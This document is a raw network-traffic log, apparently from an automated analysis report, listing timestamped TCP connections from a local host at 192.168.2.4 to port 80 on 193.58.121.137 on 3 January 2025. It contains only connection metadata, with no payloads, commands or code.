Jan 3, 2025 20:48:43.154603958 CET	50058	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.159173965 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.514444113 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.521056890 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.521070957 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.521190882 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.812465906 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.856933117 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:43.953830957 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:43.997571945 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.079864025 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.079962969 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.084748030 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.084809065 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.084902048 CET	80	50071	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.084906101 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.084979057 CET	50071	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.089720011 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.437975883 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.444976091 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.444988966 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.444998026 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.768383980 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.810075045 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:44.900430918 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:44.950804949 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.047406912 CET	50079	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.049448967 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.055247068 CET	80	50079	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.056550026 CET	80	50077	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.056615114 CET	50079	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.056634903 CET	50077	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.059354067 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.066369057 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.070271015 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.070342064 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.077406883 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.421741962 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.426615000 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.426625967 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.426635981 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.729258060 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.779759884 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.865762949 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:45.919451952 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.996534109 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:45.996927977 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.001799107 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.001888990 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.001948118 CET	80	50080	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.002002001 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.002016068 CET	50080	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.006793022 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.357141972 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.363959074 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.363971949 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.363976955 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.671683073 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.716351986 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.809292078 CET	80	50081	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.857085943 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.934451103 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.939239979 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:46.939423084 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.939589024 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:46.944420099 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.294778109 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.299735069 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.299746037 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.299757004 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.571274042 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.622821093 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.717634916 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.763329983 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.839467049 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.839641094 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.845082045 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.845093012 CET	80	50082	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:47.845201969 CET	50082	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.845222950 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.845408916 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:47.850169897 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.224891901 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.229788065 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.229799032 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.229809046 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.470125914 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.513344049 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.601258039 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.653877020 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.843080997 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.843461037 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.848365068 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.848438978 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.848701954 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:48.853434086 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.854521036 CET	80	50083	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:48.854578018 CET	50083	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.201150894 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.206098080 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.206110954 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.206120014 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.538568974 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.591370106 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.668468952 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.716392994 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.790293932 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.790484905 CET	50085	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.795368910 CET	80	50085	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.795440912 CET	50085	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.795526028 CET	80	50084	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:49.795551062 CET	50085	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.795578957 CET	50084	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:49.800338984 CET	80	50085	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.060750961 CET	50085	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.061146975 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.065984964 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.066082954 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.066179037 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.070950031 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.109647036 CET	80	50085	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.177494049 CET	50081	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.181914091 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.186738014 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.186836958 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.186923981 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.191659927 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.264550924 CET	80	50085	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.264628887 CET	50085	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.419826984 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.424688101 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.424827099 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.544574976 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.549771070 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.549789906 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.549798012 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.695255041 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.747612000 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.814026117 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.824423075 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.857007027 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.872618914 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:50.945132017 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:50.997607946 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.907928944 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.908090115 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.908431053 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.913058996 CET	80	50086	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:51.913110971 CET	50086	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.913228989 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:51.913295984 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.913326025 CET	80	50087	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:51.913373947 CET	50087	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.913532019 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:51.918431044 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.263398886 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.268593073 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.268604040 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.268614054 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.611696959 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.653975010 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.756004095 CET	80	50088	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.810133934 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.875935078 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.880794048 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:52.880878925 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.880959034 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:52.885687113 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.232491970 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.237431049 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.237442017 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.237451077 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.503725052 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.544527054 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.636322975 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.685153961 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.766016960 CET	50088	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.767294884 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.767375946 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.772089005 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.772265911 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.772320986 CET	80	50089	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:53.772381067 CET	50089	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.772481918 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:53.777261019 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.126055956 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:54.131145954 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.131158113 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.131170034 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.435530901 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.482031107 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:54.582725048 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:54.638278008 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.011116982 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.011339903 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.016078949 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.016158104 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.016243935 CET	80	50090	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.016304970 CET	50090	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.016572952 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.025201082 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.373459101 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.378459930 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.378473997 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.378485918 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.722199917 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.763277054 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.827199936 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.827502012 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.832397938 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.832408905 CET	80	50091	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.832489967 CET	50091	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.832513094 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.832612038 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.838891029 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.946294069 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.951098919 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:55.951208115 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.959898949 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:55.964677095 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.185509920 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.191066980 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.192908049 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.311072111 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.316236019 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.316248894 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.316257954 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.489723921 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.544657946 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.598861933 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.653983116 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.726963043 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.778934956 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.854576111 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.854576111 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.854973078 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.861030102 CET	80	50093	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.861371040 CET	80	50092	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.861433983 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:56.861435890 CET	50093	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.861459017 CET	50092	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.861496925 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.861624002 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:56.867816925 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.217320919 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.223144054 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.223159075 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.223170042 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.530221939 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.575792074 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.666150093 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.716464996 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.943352938 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.948234081 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:57.948295116 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.950536013 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:57.955310106 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.295054913 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.300148010 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.300162077 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.300173998 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.687091112 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.732059956 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.807468891 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.807696104 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.812551975 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.812686920 CET	80	50095	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:58.812747955 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.812786102 CET	50095	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.812931061 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:58.817749977 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.170186996 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.175184011 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.175200939 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.175211906 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.436980009 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.482089996 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.568761110 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.622692108 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.709427118 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.709490061 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.714302063 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.714477062 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.714607954 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.715358019 CET	80	50096	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:59.715423107 CET	50096	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:59.719424009 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.060363054 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:00.065252066 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.065264940 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.065275908 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.383277893 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.435225010 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:00.524929047 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:00.575977087 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.566756964 CET	50098	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.566935062 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.571624041 CET	80	50098	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.571695089 CET	50098	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.571885109 CET	80	50097	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.571947098 CET	50097	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.572736025 CET	50098	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.577507973 CET	80	50098	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.608611107 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.608661890 CET	50098	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.613409042 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.613467932 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.613631964 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.620116949 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.653688908 CET	80	50098	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.966613054 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:01.971497059 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.971510887 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:01.971523046 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.059207916 CET	80	50098	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.060175896 CET	50098	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.322532892 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.372730970 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.453272104 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.497716904 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.542020082 CET	80	50094	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.543029070 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.572698116 CET	50094	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.574352026 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.574709892 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.579451084 CET	80	50099	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.579545975 CET	50099	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.579565048 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.579667091 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.579777956 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.584587097 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.935344934 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:02.940359116 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.940373898 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:02.940385103 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.218236923 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.263361931 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:03.348541021 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.403973103 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:03.463542938 CET	50101	80	192.168.2.4	193.58.121.137
